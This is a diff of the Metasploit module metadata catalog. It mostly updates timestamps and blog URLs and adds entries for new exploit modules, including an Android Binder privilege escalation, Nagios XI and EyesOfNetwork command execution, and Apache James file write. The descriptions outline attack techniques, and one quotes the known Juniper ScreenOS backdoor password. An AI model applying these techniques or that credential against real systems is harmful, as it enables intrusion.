    ],
    "targets": null,
-    "mod_time": "2019-10-05 14:13:38 +0000",
+    "mod_time": "2020-02-21 08:41:42 +0000",
    "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_login",
@@ -36959,7 +36694,7 @@
      "zerosum0x0",
      "Tom Sellers"
    ],
-    "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability\n        by binding the MS_T120 channel outside of its normal slot and sending\n        non-DoS packets which respond differently on patched and vulnerable hosts.\n        It can optionally trigger the DoS vulnerability.",
+    "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability\n          by binding the MS_T120 channel outside of its normal slot and sending\n          non-DoS packets which respond differently on patched and vulnerable hosts.\n          It can optionally trigger the DoS vulnerability.",
    "references": [
      "CVE-2019-0708",
      "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708",
@@ -36975,7 +36710,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-11-11 17:33:10 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb",
    "is_install_path": true,
    "ref_name": "scanner/rdp/cve_2019_0708_bluekeep",
@@ -39959,7 +39694,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-05-22 13:00:09 +0000",
+    "mod_time": "2020-02-26 12:17:59 +0000",
    "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_auditor",
@@ -40239,7 +39974,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-02-13 11:56:12 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
@@ -40321,7 +40056,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-03-02 11:50:19 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -40738,7 +40473,7 @@
    "description": "This module will extract WEP keys and WPA preshared keys from\n        Arris DG950A cable modems.",
    "references": [
      "CVE-2014-4863",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
+      "URL-https://blog.rapid7.com/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
    ],
    "platform": "",
    "arch": "",
@@ -40750,7 +40485,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-07-09 12:56:00 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/arris_dg950",
@@ -40775,7 +40510,7 @@
    ],
    "description": "This module extracts password hashes from certain Brocade load\n        balancer devices.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
    ],
    "platform": "",
    "arch": "",
@@ -40787,7 +40522,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/brocade_enumhash",
@@ -40965,7 +40700,7 @@
    ],
    "description": "This module extracts WEP keys and WPA preshared keys from\n        certain Netopia cable modems.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
    ],
    "platform": "",
    "arch": "",
@@ -40977,7 +40712,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/netopia_enum",
@@ -41271,7 +41006,7 @@
    ],
    "description": "This module will extract WEP keys and WPA preshared keys from\n        certain Ubee cable modems.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
    ],
    "platform": "",
    "arch": "",
@@ -41283,7 +41018,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/ubee_ddw3611",
@@ -41543,7 +41278,7 @@
    "description": "This module scans for the Juniper SSH backdoor (also valid on Telnet).\n        Any username is required, and the password is <<< %s(un='%s') = %u.",
    "references": [
      "CVE-2015-7755",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
+      "URL-https://blog.rapid7.com/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
      "URL-https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713"
    ],
    "platform": "",
@@ -41556,7 +41291,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-15 06:48:35 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/juniper_backdoor",
@@ -42285,7 +42020,7 @@
      "BID-51182",
      "CVE-2011-4862",
      "EDB-18280",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
+      "URL-https://blog.rapid7.com/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
    ],
    "platform": "",
    "arch": "",
@@ -42297,7 +42032,7 @@
      "telnet"
    ],
    "targets": null,
-    "mod_time": "2018-02-14 09:19:28 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_encrypt_overflow",
@@ -44094,7 +43829,7 @@
    ],
    "description": "This module will automatically serve browser exploits. Here are the options you can\n        configure:\n\n        The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example,\n        if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.\n\n        The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash\n        exploits, you can set this. Also note that the Exclude option will always be evaluated\n        after the Include option.\n\n        The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.\n        By default, 20 will be loaded. But note that the client will probably not be vulnerable\n        to all 20 of them, so only some will actually be served to the client.\n\n        The HTMLContent option allows you to provide a basic webpage. This is what the user behind\n        the vulnerable browser will see. You can simply set a string, or you can do the file://\n        syntax to load an HTML file. Note this option might break exploits so try to keep it\n        as simple as possible.\n\n        The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to\n        get. The default -1 means unlimited. Combining this with other options such as RealList\n        and Custom404, you can get information about which visitors (IPs) clicked on your malicious\n        link, what exploits they might be vulnerable to, redirect them to your own internal\n        training website without actually attacking them.\n\n        For more information about Browser Autopwn, please see the referenced blog post.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
+      "URL-https://blog.rapid7.com/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
    ],
    "platform": "",
    "arch": "",
@@ -44106,7 +43841,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/server/browser_autopwn2.rb",
    "is_install_path": true,
    "ref_name": "server/browser_autopwn2",
@@ -45608,7 +45343,7 @@
    "references": [
      "CVE-2014-4877",
      "URL-https://bugzilla.redhat.com/show_bug.cgi?id=1139181",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
+      "URL-https://blog.rapid7.com/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
    ],
    "platform": "",
    "arch": "",
@@ -45620,7 +45355,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/server/wget_symlink_file_write.rb",
    "is_install_path": true,
    "ref_name": "server/wget_symlink_file_write",
@@ -47256,7 +46991,7 @@
    ],
    "description": "This module emulates a webserver leaking PII data",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
+      "URL-https://blog.rapid7.com/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
    ],
    "platform": "",
    "arch": "",
@@ -47268,7 +47003,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/vsploit/pii/web_pii.rb",
    "is_install_path": true,
    "ref_name": "vsploit/pii/web_pii",
@@ -49480,6 +49215,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_android/local/binder_uaf": {
+    "name": "Android Binder Use-After-Free Exploit",
+    "fullname": "exploit/android/local/binder_uaf",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-26",
+    "type": "exploit",
+    "author": [
+      "Jann Horn",
+      "Maddie Stone",
+      "grant-h",
+      "timwr"
+    ],
+    "description": "This module exploits CVE-2019-2215, which is a use-after-free in Binder in the\n          Android kernel. The bug is a local privilege escalation vulnerability that\n          allows for a full compromise of a vulnerable device. If chained with a browser\n          renderer exploit, this bug could fully compromise a device through a malicious\n          website.\n          The freed memory is replaced with an iovec structure in order to leak a pointer\n          to the task_struct. Finally the bug is triggered again in order to overwrite\n          the addr_limit, making all memory (including kernel memory) accessible as part\n          of the user-space memory range in our process and allowing arbitrary reading\n          and writing of kernel memory.",
+    "references": [
+      "CVE-2019-2215",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1942",
+      "URL-https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html",
+      "URL-https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/",
+      "URL-https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c"
+    ],
+    "platform": "Android,Linux",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-29 11:22:59 +0000",
+    "path": "/modules/exploits/android/local/binder_uaf.rb",
+    "is_install_path": true,
+    "ref_name": "android/local/binder_uaf",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_android/local/futex_requeue": {
    "name": "Android 'Towelroot' Futex Requeue Kernel Exploit",
    "fullname": "exploit/android/local/futex_requeue",
@@ -49914,7 +49695,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.",
+    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only bsd/vax/shell_reverse_tcp is supported.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Morris_worm",
      "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -49934,7 +49715,7 @@
    "targets": [
      "@(#)fingerd.c   5.1 (Berkeley) 6/6/85"
    ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
    "path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
    "is_install_path": true,
    "ref_name": "bsd/finger/morris_fingerd_bof",
@@ -50923,7 +50704,7 @@
      "CWE-94",
      "OSVDB-112004",
      "EDB-34765",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
+      "URL-https://blog.rapid7.com/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
      "URL-https://access.redhat.com/articles/1200223",
      "URL-https://seclists.org/oss-sec/2014/q3/649"
    ],
@@ -50948,7 +50729,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2018-09-17 22:29:20 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/advantech_switch_bash_env_exec",
@@ -53610,6 +53391,60 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/eyesofnetwork_autodiscovery_rce": {
+    "name": "EyesOfNetwork AutoDiscovery Target Command Execution",
+    "fullname": "exploit/linux/http/eyesofnetwork_autodiscovery_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-06",
+    "type": "exploit",
+    "author": [
+      "Clément Billac",
+      "bcoles <bcoles@gmail.com>",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3\n        and prior in order to execute arbitrary commands as root.\n\n        This module takes advantage of a command injection vulnerability in the\n        `target` parameter of the AutoDiscovery functionality within the EON web\n        interface in order to write an Nmap NSE script containing the payload to\n        disk. It then starts an Nmap scan to activate the payload. This results in\n        privilege escalation because the`apache` user can execute Nmap as root.\n\n        Valid credentials for a user with administrative privileges are required.\n        However, this module can bypass authentication via two methods, i.e. by\n        generating an API access token based on a hardcoded key, and via SQLI.\n        This module has been successfully tested on EyesOfNetwork 5.3 with API\n        version 2.4.2.",
+    "references": [
+      "CVE-2020-8654",
+      "CVE-2020-8655",
+      "CVE-2020-8656",
+      "CVE-2020-8657",
+      "EDB-48025"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-03-02 15:10:46 +0000",
+    "path": "/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/eyesofnetwork_autodiscovery_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/f5_icall_cmd": {
    "name": "F5 iControl iCall::Script Root Command Execution",
    "fullname": "exploit/linux/http/f5_icall_cmd",
@@ -54290,7 +54125,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-06-24 13:38:14 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb",
    "is_install_path": true,
    "ref_name": "linux/http/hp_van_sdn_cmd_inject",
@@ -55502,7 +55337,7 @@
      "CVE-2013-0136",
      "OSVDB-93444",
      "US-CERT-VU-701572",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
    ],
    "platform": "Linux",
    "arch": "x86",
@@ -55525,7 +55360,7 @@
    "targets": [
      "Mutiny 5.0-1.07 Appliance (Linux)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/http/mutiny_frontend_upload.rb",
    "is_install_path": true,
    "ref_name": "linux/http/mutiny_frontend_upload",
@@ -55587,6 +55422,58 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/nagios_xi_authenticated_rce": {
+    "name": "Nagios XI Authenticated Remote Command Execution",
+    "fullname": "exploit/linux/http/nagios_xi_authenticated_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-07-29",
+    "type": "exploit",
+    "author": [
+      "Jak Gibb",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits a vulnerability in Nagios XI before 5.6.6 in\n        order to execute arbitrary commands as root.\n\n        The module uploads a malicious plugin to the Nagios XI server and then\n        executes this plugin by issuing an HTTP GET request to download a\n        system profile from the server. For all supported targets except Linux\n        (cmd), the module uses a command stager to write the exploit to the\n        target via the malicious plugin. This may not work if Nagios XI is\n        running in a restricted Unix environment, so in that case the target\n        must be set to Linux (cmd). The module then writes the payload to the\n        malicious plugin while avoiding commands that may not be supported.\n\n        Valid credentials for a user with administrative privileges are\n        required. This module was successfully tested on Nagios XI 5.6.5\n        running on CentOS 7. The module may behave differently against older\n        versions of Nagios XI. See the documentation for more information.",
+    "references": [
+      "CVE-2019-15949",
+      "URL-https://github.com/jakgibb/nagiosxi-root-rce-exploit"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux (x86)",
+      "Linux (x64)",
+      "Linux (cmd)"
+    ],
+    "mod_time": "2020-03-09 11:56:15 +0000",
+    "path": "/modules/exploits/linux/http/nagios_xi_authenticated_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/nagios_xi_authenticated_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/nagios_xi_chained_rce": {
    "name": "Nagios XI Chained Remote Code Execution",
    "fullname": "exploit/linux/http/nagios_xi_chained_rce",
@@ -57459,7 +57346,7 @@
    "description": "This module exploits a buffer overflow on the Supermicro Onboard IPMI controller web\n        interface. The vulnerability exists on the close_window.cgi CGI application, and is due\n        to the insecure usage of strcpy. In order to get a session, the module will execute\n        system() from libc with an arbitrary CMD payload sent on the User-Agent header. This\n        module has been tested successfully on Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n        SMT_X9_214.",
    "references": [
      "CVE-2013-3623",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -57482,7 +57369,7 @@
    "targets": [
      "Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/smt_ipmi_close_window_bof",
@@ -58993,7 +58880,7 @@
      "Automatic (Unix In-Memory)",
      "Automatic (Linux Dropper)"
    ],
-    "mod_time": "2020-01-16 14:46:00 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
    "is_install_path": true,
    "ref_name": "linux/http/webmin_backdoor",
@@ -59349,7 +59236,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
    "path": "/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zenoss_showdaemonxmlconfig_exec",
@@ -60268,6 +60155,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/local/diamorphine_rootkit_signal_priv_esc": {
+    "name": "Diamorphine Rootkit Signal Privilege Escalation",
+    "fullname": "exploit/linux/local/diamorphine_rootkit_signal_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2013-11-07",
+    "type": "exploit",
+    "author": [
+      "m0nad",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses Diamorphine rootkit's privesc feature using signal\n        64 to elevate the privileges of arbitrary processes to UID 0 (root).\n\n        This module has been tested successfully with Diamorphine from `master`\n        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).",
+    "references": [
+      "URL-https://github.com/m0nad/Diamorphine"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-16 14:53:16 +0000",
+    "path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/local/docker_daemon_privilege_escalation": {
    "name": "Docker Daemon Privilege Escalation",
    "fullname": "exploit/linux/local/docker_daemon_privilege_escalation",
@@ -60322,7 +60255,7 @@
      "Marco Ivaldi",
      "Guillaume André"
    ],
-    "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n        Improper validation of recipient address in deliver_message()\n        function in /src/deliver.c may lead to command execution with root privileges\n        (CVE-2019-10149).",
+    "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n          Improper validation of recipient address in deliver_message()\n          function in /src/deliver.c may lead to command execution with root privileges\n          (CVE-2019-10149).",
    "references": [
      "CVE-2019-10149",
      "EDB-46996",
@@ -60340,7 +60273,7 @@
    "targets": [
      "Exim 4.87 - 4.91"
    ],
-    "mod_time": "2019-07-18 10:45:44 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -61007,7 +60940,7 @@
    "targets": [
      "Micro Focus (HPE) Data Protector <= 10.40 build 118"
    ],
-    "mod_time": "2019-11-03 00:33:24 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
    "path": "/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/omniresolve_suid_priv_esc",
@@ -61922,7 +61855,7 @@
      "BID-61966",
      "URL-http://blog.cmpxchg8b.com/2013/08/security-debianisms.html",
      "URL-http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit"
+      "URL-https://blog.rapid7.com/2013/09/05/cve-2013-1662-vmware-mount-exploit"
    ],
    "platform": "Linux",
    "arch": "x86",
@@ -61936,7 +61869,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-10-10 14:35:34 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/local/vmware_mount.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vmware_mount",
@@ -62258,7 +62191,7 @@
    "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
    "references": [
      "CVE-2014-4880",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://blog.rapid7.com/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
    ],
    "platform": "Linux",
    "arch": "armle",
@@ -62273,7 +62206,7 @@
      "DS-7204 Firmware V2.2.10 build 131009",
      "Debug Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -63861,6 +63794,50 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/smtp/apache_james_exec": {
+    "name": "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
+    "fullname": "exploit/linux/smtp/apache_james_exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2015-10-01",
+    "type": "exploit",
+    "author": [
+      "Palaczynski Jakub",
+      "Matthew Aberegg",
+      "Michael Burkey"
+    ],
+    "description": "This module exploits a vulnerability that exists due to a lack of input\n        validation when creating a user. Messages for a given user are stored\n        in a directory partially defined by the username. By creating a user\n        with a directory traversal payload as the username, commands can be\n        written to a given directory. To use this module with the cron\n        exploitation method, run the exploit using the given payload, host, and\n        port. After running the exploit, the payload will be executed within 60\n        seconds. Due to differences in how cron may run in certain Linux\n        operating systems such as Ubuntu, it may be preferable to set the\n        target to Bash Completion as the cron method may not work. If the target\n        is set to Bash completion, start a listener using the given payload,\n        host, and port before running the exploit. After running the exploit,\n        the payload will be executed when a user logs into the system. For this\n        exploitation method, bash completion must be enabled to gain code\n        execution. This exploitation method will leave an Apache James mail\n        object artifact in the /etc/bash_completion.d directory and the\n        malicious user account.",
+    "references": [
+      "CVE-2015-7611",
+      "EDB-35513",
+      "URL-https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Bash Completion",
+      "Cron"
+    ],
+    "mod_time": "2020-02-19 18:57:08 +0000",
+    "path": "/modules/exploits/linux/smtp/apache_james_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/smtp/apache_james_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/smtp/exim4_dovecot_exec": {
    "name": "Exim and Dovecot Insecure Configuration Command Injection",
    "fullname": "exploit/linux/smtp/exim4_dovecot_exec",
@@ -64189,7 +64166,7 @@
    "references": [
      "CVE-2016-1560",
      "CVE-2016-1561",
-      "URL-https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
+      "URL-https://blog.rapid7.com/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -64203,7 +64180,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/ssh/exagrid_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/exagrid_known_privkey",
@@ -64231,7 +64208,7 @@
      "URL-https://www.trustmatta.com/advisories/MATTA-2012-002.txt",
      "CVE-2012-1493",
      "OSVDB-82780",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/25/press-f5-for-root-shell"
+      "URL-https://blog.rapid7.com/2012/06/25/press-f5-for-root-shell"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -64245,7 +64222,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/f5_bigip_known_privkey",
@@ -64674,7 +64651,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-04-24 11:39:34 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -64695,6 +64672,47 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/upnp/dlink_dir859_exec_ssdpcgi": {
+    "name": "D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi",
+    "fullname": "exploit/linux/upnp/dlink_dir859_exec_ssdpcgi",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
